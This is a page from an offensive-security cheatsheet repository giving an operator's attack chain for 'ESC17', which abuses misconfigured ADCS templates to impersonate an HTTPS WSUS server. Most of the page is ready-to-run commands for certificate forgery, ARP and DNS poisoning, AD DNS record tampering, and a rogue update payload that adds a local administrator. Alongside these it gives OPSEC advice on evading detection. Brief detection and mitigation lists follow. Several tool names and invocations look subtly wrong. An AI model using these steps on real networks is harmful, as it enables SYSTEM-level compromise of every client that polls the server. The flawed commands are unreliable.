daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

esc17-adcs-certificate-spoofing-to-attack-https-enabled-wsus-clients.md (12435B)


      1 ---
      2 title: "ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients"
      3 description: "ESC17 was coined by researchers Alexander Neff and Phil Knüfer at DigiTrace in January 2026. Unlike ESC1–ESC16 which target domain privilege escalation…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement"]
      7 tools: ["NetExec", "Impacket", "Certipy", "Responder", "OpenSSL"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients.md"
     11 ---
     12 # ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Lateral Movement / Client Compromise |
     19 | **Difficulty** | High |
     20 | **Pre-requisites** | Template with Server Auth EKU + `ENROLLEE_SUPPLIES_SUBJECT` + WSUS deployed + MiTM capability |
     21 | **Tools** | Certipy, PyWSUS, Responder, dnstool.py |
     22 | **OPSEC Noise** | Medium-High — cert request + network-level MiTM |
     23 | **One-liner** | Request CA-signed TLS cert for WSUS hostname via misconfigured template → MiTM WSUS traffic → serve malicious updates → SYSTEM on all clients. |
     24 
     25 ***
     26 
     27 ## What Is ESC17?
     28 
     29 ESC17 was coined by researchers **Alexander Neff and Phil Knüfer** at DigiTrace in January 2026. Unlike ESC1–ESC16 which target **domain privilege escalation**, ESC17 targets **lateral movement and client compromise** by weaponising misconfigured ADCS templates to **impersonate a WSUS (Windows Server Update Services) server** — even when WSUS is secured with HTTPS.
     30 
     31 The common belief was that enabling HTTPS on WSUS made it immune to spoofing and interception attacks. ESC17 shatters that assumption entirely. If an ADCS template permits low-privileged users to enroll and specify their own SAN, and that template has **Server Authentication EKU** — an attacker can request a **legitimate, CA-signed TLS certificate for the WSUS server's hostname**. With a trusted cert in hand they can MiTM the WSUS traffic, serve malicious updates, and achieve **SYSTEM-level code execution on every domain-joined client that polls that WSUS server**.
     32 
     33 ***
     34 
     35 ## ESC17 vs ESC1 — The Critical Distinction
     36 
     37 ESC17 is essentially an **incomplete mitigation of ESC1**. Many organisations hardened ESC1 by removing `Client Authentication` EKU from permissive templates — but left `Server Authentication` EKU in place, not realising it opens a completely different attack surface:
     38 
     39 | | ESC1 | ESC17 |
     40 |---|---|---|
     41 | **EKU abused** | `Client Authentication` (1.3.6.1.5.5.7.3.2) | **`Server Authentication` (1.3.6.1.5.5.7.3.1)** |
     42 | **What you forge** | Identity as a domain user | **Identity as a server (e.g. WSUS)** |
     43 | **Attack outcome** | Authenticate as Administrator → Domain Admin | **Impersonate WSUS → push malicious updates → SYSTEM on all clients** |
     44 | **ESC1 mitigation blocks it?** | N/A | ❌ Removing Client Auth EKU does NOT fix it |
     45 | **Requires HTTPS?** | N/A | ❌ Bypasses HTTPS entirely |
     46 | **Target** | AD authentication | **Windows Update clients** |
     47 
     48 ***
     49 
     50 ## Required Conditions
     51 
     52 | Condition | Notes |
     53 |-----------|-------|
     54 | Certificate template has **`Server Authentication` EKU** | OID `1.3.6.1.5.5.7.3.1` |
     55 | Template has **`ENROLLEE_SUPPLIES_SUBJECT`** (SAN control) | Same flag as ESC1 — `Enrollee Supplies Subject: True` |
     56 | Low-priv users can enroll | `Enrollment Rights: Domain Users` or similar |
     57 | WSUS is deployed in the environment | Required target for the impersonation |
     58 | Attacker can intercept or redirect WSUS traffic | ARP poisoning, DNS manipulation, BGP — any MiTM method |
     59 
     60 > 💡 ESC17 can also be combined with **weak DNS ACL permissions** — if a low-priv user can also modify AD-integrated DNS records, they can redirect WSUS hostname resolution to their machine without needing any network-level MiTM. DNS ACL abuse + ESC17 is a particularly clean attack chain.
     61 
     62 ***
     63 
     64 ## Understanding the WSUS Attack Context
     65 
     66 Before diving into the exploit chain, understand the target:
     67 
     68 ```
     69 Normal WSUS flow:
     70   [Domain Client] ──── HTTPS ────► [WSUS Server wsus.domain.htb]
     71   Validates TLS cert of WSUS server
     72   Downloads + installs updates (runs as SYSTEM)
     73 
     74 ESC17 abuse flow:
     75   [Attacker] requests cert for wsus.domain.htb via misconfigured template
     76   [Attacker box] presents valid TLS cert for wsus.domain.htb ← CA-signed
     77   [Domain Client] trusts the cert ← same CA they always trusted
     78   [Domain Client] ──── HTTPS ────► [Attacker box pretending to be WSUS]
     79   Receives malicious update package
     80   Executes as SYSTEM ← Game over
     81 ```
     82 
     83 ***
     84 
     85 ## Full Attack Chain
     86 
     87 ### Step 1 — Enumerate Vulnerable Templates
     88 
     89 ```bash
     90 # Look for templates with Server Authentication EKU + Enrollee Supplies Subject
     91 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \
     92   -dc-ip $TARGET -vulnerable -stdout
     93 
     94 # Manually grep if needed — Server Auth OID is 1.3.6.1.5.5.7.3.1
     95 # Look for this pattern in certipy output:
     96 # Extended Key Usage : Server Authentication   ← Target EKU
     97 # Enrollee Supplies Subject : True             ← SAN control
     98 # Enrollment Rights : DOMAIN\Domain Users      ← Low-priv enroll
     99 ```
    100 
    101 ### Step 2 — Identify the WSUS Server Hostname
    102 
    103 ```bash
    104 # Query AD for WSUS server hostname via WUA (Windows Update Agent) settings
    105 netexec ldap $TARGET -u 'lowpriv' -p 'Password123!' \
    106   -M get-desc-users
    107 
    108 # Or check via registry (if you have a foothold on a client)
    109 reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v WUServer
    110 
    111 # Typical output:
    112 # WUServer = https://wsus.domain.htb:8531
    113 ```
    114 
    115 ### Step 3 — Request a Certificate for the WSUS Server Hostname
    116 
    117 Use the `-dns` flag instead of `-upn` — because this is a Server Authentication cert, the identity is embedded as a DNS SAN, not a UPN:
    118 
    119 ```bash
    120 certipy-ad req \
    121   -u 'lowpriv@domain.htb' \
    122   -p 'Password123!' \
    123   -dc-ip $TARGET \
    124   -ca 'DOMAIN-CA-NAME' \
    125   -template 'VulnServerAuthTemplate' \
    126   -dns 'wsus.domain.htb'
    127 
    128 # Output: wsus.pfx
    129 # Certificate contains DNS SAN = wsus.domain.htb
    130 # Signed by the domain CA — clients will trust it
    131 ```
    132 
    133 ### Step 4 — Set Up a Rogue WSUS Server
    134 
    135 ```bash
    136 # Use PWSHark or a custom HTTPS server with your cert
    137 # The simplest approach — Python HTTPS server with the cert
    138 
    139 openssl pkcs12 -in wsus.pfx -out wsus.pem -nodes
    140 # Split into cert.pem and key.pem then:
    141 
    142 python3 -c "
    143 import ssl, http.server
    144 context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    145 context.load_cert_chain('wsus.pem')
    146 httpd = http.server.HTTPServer(('0.0.0.0', 8531), http.server.BaseHTTPRequestHandler)
    147 httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
    148 httpd.serve_forever()
    149 "
    150 
    151 # More practically — use PyWSUS or a dedicated WSUS spoofing tool
    152 # to serve malicious Windows Update packages
    153 ```
    154 
    155 ### Step 5 — Redirect WSUS Traffic to Your Box
    156 
    157 **Option A — ARP Poisoning (LAN access):**
    158 ```bash
    159 arpspoof -i eth0 -t <CLIENT-IP> <WSUS-IP>
    160 arpspoof -i eth0 -t <WSUS-IP> <CLIENT-IP>
    161 ```
    162 
    163 **Option B — DNS Record Manipulation (if you have DNS write ACLs):**
    164 ```bash
    165 # If you have WriteProperty on the DNS zone (common misconfiguration)
    166 # Update the WSUS A record to point to your IP
    167 impacket-adidnsdump -u 'domain.htb\lowpriv' -p 'Password123!' $TARGET
    168 # Then modify the WSUS record with dnstool.py or adidnsdump
    169 python3 dnstool.py \
    170   -u 'domain.htb\lowpriv' \
    171   -p 'Password123!' \
    172   --action modify \
    173   --record wsus \
    174   --data <YOUR-IP> \
    175   $TARGET
    176 ```
    177 
    178 **Option C — Responder DNS poisoning (if clients query via broadcast):**
    179 ```bash
    180 responder -I eth0 -A  # Analyse mode first to see queries
    181 responder -I eth0     # Then active to poison
    182 ```
    183 
    184 ### Step 6 — Serve Malicious Update and Get SYSTEM
    185 
    186 ```bash
    187 # When a client polls your rogue WSUS server over HTTPS with your
    188 # legitimate CA-signed cert, it accepts the connection and downloads
    189 # whatever update package you serve.
    190 # Windows Update runs packages as SYSTEM.
    191 
    192 # Using PyWSUS for update spoofing:
    193 # https://github.com/GoSecure/pywsus
    194 python3 wsus-inject.py \
    195   --host 0.0.0.0 \
    196   --port 8531 \
    197   --cert wsus.pem \
    198   --payload 'cmd.exe /c net user hacker Password123! /add && net localgroup administrators hacker /add'
    199 
    200 # Every domain-joined client polling this WSUS = SYSTEM shell
    201 ```
    202 
    203 ***
    204 
    205 ## ESC17 + Weak DNS ACLs — The Clean Chain
    206 
    207 The most powerful ESC17 scenario discovered by Mustafa Durukan combines ESC17 with DNS ACL abuse:
    208 
    209 ```
    210 [lowpriv@domain.htb]
    211         │
    212         ├── WriteProperty on DNS Zone object (common misconfiguration)
    213         │   Modify WSUS A record → point to YOUR-IP
    214         │
    215         └── Enroll in Server Auth + Enrollee Supplies Subject template
    216             Request cert for wsus.domain.htb
    217             Serve rogue WSUS over HTTPS with valid cert
    218                     │
    219                     ▼
    220         [All WSUS clients redirected + TLS trusted]
    221                     │
    222                     ▼
    223         [Malicious update pushed → SYSTEM on every client]
    224 ```
    225 
    226 No ARP spoofing. No network-level MiTM. Just two AD misconfigurations chained together.
    227 
    228 ***
    229 
    230 ## ESC17 Real-World Significance
    231 
    232 In my opinion, ESC17 is one of the more impactful recent ADCS discoveries precisely because it **exploits defensive blind spots**. Defenders who specifically hardened ESC1 by removing `Client Authentication` EKU may have created a false sense of security — leaving `Server Authentication` wide open. It also targets **client machines at scale** rather than just domain admins, meaning a successful ESC17 attack could compromise every endpoint in the organisation simultaneously.
    233 
    234 ***
    235 
    236 ## Detection Indicators
    237 
    238 - **Event ID 4887** — Certificate issued with a DNS SAN matching an internal server hostname (e.g. `wsus.domain.htb`) where the requester is a low-priv user account
    239 - **DNS audit logs** — Unexpected modification of WSUS or critical server DNS records
    240 - **WSUS client logs** — Clients connecting to a WSUS IP that doesn't match the known WSUS server IP
    241 - **Certificate Transparency monitoring** — Any cert issued for internal hostnames like `wsus.domain.htb` should alert immediately
    242 - **Network IDS** — HTTPS connections to WSUS port (8530/8531) from non-WSUS IPs
    243 
    244 ***
    245 
    246 ## Mitigation
    247 
    248 - **Remove `Server Authentication` EKU** from any template that also has `ENROLLEE_SUPPLIES_SUBJECT` — this is the direct fix
    249 - **Restrict enrollment rights** — templates with Server Auth EKU should never be enrollable by `Domain Users`
    250 - **Pin WSUS server certificate** via Group Policy — configure clients to only trust a specific certificate thumbprint for WSUS connections
    251 - **Audit DNS ACLs** — remove unnecessary `WriteProperty` permissions from AD-integrated DNS zones
    252 - **WSUS over HTTPS alone is not sufficient** — implement certificate pinning OR restrict which certificates clients accept for WSUS communication
    253 - **Run `certipy find -vulnerable`** and specifically look for templates with `Server Authentication` EKU + `Enrollee Supplies Subject: True` — this combination is ESC17
    254 
    255 ***
    256 
    257 ## OPSEC Considerations
    258 
    259 | Action | Event Generated | Noise Level |
    260 |--------|----------------|-------------|
    261 | Certificate request with DNS SAN | Event ID 4887 on CA | 🟡 Medium |
    262 | ARP poisoning for MiTM | Network IDS alerts | 🔴 High |
    263 | DNS record modification | DNS audit logs | 🟡 Medium |
    264 | Rogue WSUS server operation | Client WSUS logs, network anomalies | 🔴 High |
    265 | Malicious update execution | Sysmon, EDR process creation | 🔴 High |
    266 
    267 > ⚠️ ESC17 is a **high-noise** attack due to the network-level MiTM component. The DNS manipulation variant is cleaner but still generates audit logs. Best suited for environments with limited network monitoring.
    268 
    269 ***
    270 
    271 ## References
    272 
    273 - [Using ADCS to Attack HTTPS-Enabled WSUS Clients — DigiTrace](https://blog.digitrace.de/2026/01/using-adcs-to-attack-https-enabled-wsus-clients/)
    274 - [ADCS Misconfig & Weak DNS ACLs Compromise WSUS Clients — Mustafa Durukan](https://www.linkedin.com/posts/mustafa-durukan_esc17-from-adcs-misconfiguration-to-wsus-activity-7432130640709357568-d9CE)
    275 - [AD CS Security: Understanding and Exploiting ESC Techniques — Vaadata](https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/)
    276 - [Active Directory Certificate ESC Attacks — InternalAllTheThings](/internal/active-directory/ad-adcs-esc)